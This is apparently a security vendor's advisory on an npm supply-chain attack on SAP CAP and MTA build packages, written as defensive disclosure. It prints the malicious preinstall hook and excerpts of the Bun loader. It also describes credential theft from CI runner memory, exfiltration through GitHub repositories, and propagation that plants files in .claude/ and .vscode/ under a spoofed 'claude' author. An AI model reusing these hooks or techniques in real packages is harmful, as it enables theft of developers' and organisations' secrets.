A new npm supply-chain compromise is targeting the SAP developer ecosystem.
The affected packages we are tracking so far are:
@cap-js/sqlite - v2.2.2@cap-js/postgres - v2.2.2@cap-js/db-service - v2.10.1mbt@1.2.48The pattern is familiar but also a bit different: a trusted package receives a new preinstall hook, the hook runs a new setup.mjs file, and that loader downloads the Bun JavaScript runtime to execute a large obfuscated payload named execution.js.
The payload is an 11.7 MB credential stealer and propagation framework. It harvests local developer credentials, GitHub and npm tokens, GitHub Actions secrets, and cloud secrets from AWS, Azure, GCP, and Kubernetes. It then exfiltrates encrypted results through public GitHub repositories.
The malware names those repositories with a hardcoded description:
A Mini Shai-Hulud has Appeared
The compromised packages use npm lifecycle execution. In what we’ve seen so far, package.json was modified to add:
"scripts": {
"preinstall": "node setup.mjs"
}That means the malicious code runs automatically during npm install, before the install has even completed.
The malicious package adds two files:
setup.mjsexecution.jsThe normal package code still looks like the legitimate SAP package. In the @cap-js/sqlite@2.2.2 sample, the ordinary files match clean @cap-js/sqlite@2.2.1 byte-for-byte. The compromise is the install hook plus the added payload files.
A public lead points to a likely cause: an npm token exposed to pull request builds through CircleCI.
That lines up with what we found in SAP/cloud-mta-build-tool. On April 29, a short-lived draft PR titled feat: ci speedup was opened from gruposbftechrecruiter/harkonnen-navigator-149. The PR was closed within minutes and the branch was later force-pushed, leaving the current GitHub diff empty.
CircleCI still kept the important part. A PR build on pull/1223 checked out commit a959014aa7b7fc37a9b5730c951776e7db2920a6, which added a Bun loader at bin/config.mjs, added an obfuscated payload at bin/mbt.js, and changed the test command to:
node ./bin/config.mjs && node ./bin/mbtThat test ran in a PR job where CircleCI listed redacted project secrets, including CLOUD_MTA_BOT_NPM_TOKEN, CLOUD_MTA_BOT_GITHUB_TOKEN, CircleCI OIDC tokens, Docker Hub credentials, Cloud Foundry credentials, and other release-related variables.
The logs also showed Octokit warnings for POST https://api.github.com/user/repos, which matches the malware's GitHub exfiltration behavior.
This makes the CircleCI PR build the strongest lead for the initial credential theft.
The first stage, setup.mjs, is a Bun bootstrapper. It checks the operating system and architecture, downloads Bun 1.3.13 from GitHub when needed, extracts the binary, and uses Bun to run execution.js.
const BUN_VERSION = '1.3.13';
const ENTRY_SCRIPT = 'execution.js';
const url = `https://github.com/oven-sh/bun/releases/download/bun-v${BUN_VERSION}/${asset}.zip`;
execFileSync(binPath, [entryScriptPath], { stdio: 'inherit', cwd: SCRIPT_DIR });The second stage, execution.js, is a single large obfuscated payload. It uses a custom string scrambling layer labeled ctf-scramble-v2, checks whether it is running in CI, exits on Russian locale settings, and daemonizes itself on non-CI machines.
The payload is built to hit both developer laptops and CI/CD runners.
It attempts to collect:
gh auth token.npmrcThe GitHub Actions path is especially concerning. The payload includes an embedded Python helper that searches /proc for the Runner.Worker process, reads its memory, and extracts masked secret structures from the runner.
The malware uses GitHub as its exfiltration channel.
The new propagation keyword is:
OhNoWhatsGoingOnWithGitHubThe malware searches GitHub commits for this string and uses matching commit messages as a token dead-drop. Commit messages matching OhNoWhatsGoingOnWithGitHub:<base64> are decoded into GitHub tokens and checked for repository access.
When the malware can create a repository, it uses randomized Dune-themed names, sets the repository description to:
A Mini Shai-Hulud has Appearedand writes encrypted result files under:
results/results-<timestamp>-<counter>.jsonThe data is compressed and encrypted before commit using AES-256-GCM, with the AES key wrapped by an embedded RSA public key.
The payload contains logic for spreading through developer and release workflows.
In the analyzed samples, the malware checks for GitHub Actions release automation related to cap-js/cds-dbs. If it sees a release workflow in that repository context, it can modify a package tarball by:
execution.jssetup.mjsscripts.preinstall = "node setup.mjs"It also attempts to use stolen GitHub Actions tokens to push files into repositories:
.vscode/tasks.json.vscode/setup.mjs.claude/execution.js.claude/setup.mjs.claude/settings.jsonThose commits use:
chore: update dependencieswith the author:
claude <claude@users.noreply.github.com>The targeted packages sit in normal SAP development workflows. @cap-js/sqlite, @cap-js/postgres, and @cap-js/db-service are part of the SAP CAP database ecosystem, while mbt is used around SAP Cloud MTA build workflows.
That makes this campaign small in package count but potentially high impact. These packages are likely to run on developer machines and CI runners that have access to GitHub, npm, cloud credentials, and enterprise deployment secrets.
Search lockfiles, package caches, CI logs, internal registries, artifact stores, and developer machines for:
@cap-js/sqlite - v2.2.2@cap-js/postgres - v2.2.2@cap-js/db-service - v2.10.1mbt@1.2.48setup.mjsexecution.jspreinstall scripts running node setup.mjs1.3.13 downloads during package installationSearch GitHub for:
OhNoWhatsGoingOnWithGitHub: https://github.com/search?q=OhNoWhatsGoingOnWithGitHub&type=commitsA Mini Shai-Hulud has AppearedOhNoWhatsGoingOnWithGitHubchore: update dependenciesclaude <claude@users.noreply.github.com>.claude/ or .vscode/setup.mjs filesresults/results-*.json files in newly created public repositoriesIf any affected package was installed, rotate secrets. Do not limit rotation to npm tokens. The payload targets GitHub, npm, cloud providers, Kubernetes, CI secrets, and local developer tooling.
If you are an Aikido user, check your central feed and filter on malware issues. This will surface as a 100/100 critical issue. Aikido rescans nightly, but we recommend triggering a manual rescan now.
If you are not yet an Aikido user, you can create an account and connect your repos. Our malware coverage is included in the free plan, no credit card required.
For broader coverage across your whole team, Aikido's Endpoint Protection gives you visibility and control over the software packages installed on your team's devices. It covers browser extensions, code libraries, IDE plugins, and build dependencies, all in one place. Stop malware before it gets installed.
For future protection, consider Aikido Safe Chain (open source). Safe Chain sits in your existing workflow, intercepting npm, npx, yarn, pnpm, and pnpx commands and checking packages against Aikido Intel before install.
Affected packages:
@cap-js/sqlite - v2.2.2@cap-js/postgres - v2.2.2@cap-js/db-service - v2.10.1mbt@1.2.48Hashes from the analyzed @cap-js/sqlite@2.2.2 sample:
setup.mjs: 4066781fa830224c8bbcc3aa005a396657f9c8f9016f9a64ad44a9d7f5f45e34execution.js: 6f933d00b7d05678eb43c90963a80b8947c4ae6830182f89df31da9f568fea9529ac906c8bd801dfe1cb39596197df49f80fff2270b3e7fbab52278c24e4f1a7Strings and markers:
A Mini Shai-Hulud has AppearedOhNoWhatsGoingOnWithGitHub (propagation keyword / GitHub commit dead-drop marker)ctf-scramble-v2tmp.987654321.lockchore: update dependenciesclaude@users.noreply.github.comURLs and endpoints:
hxxps://github[.]com/oven-sh/bun/releases/download/bun-v1.3.13/hxxps://api.github[.]com/search/commits?q=OhNoWhatsGoingOnWithGitHub&sort=author-date&order=desc&per_page=50hxxp://169.254.169.254hxxp://169.254.170.2hxxp://[fd00:ec2::254]
此内容由惯性聚合(RSS阅读器)自动聚合整理,仅供阅读参考。 原文来自 — 版权归原作者所有。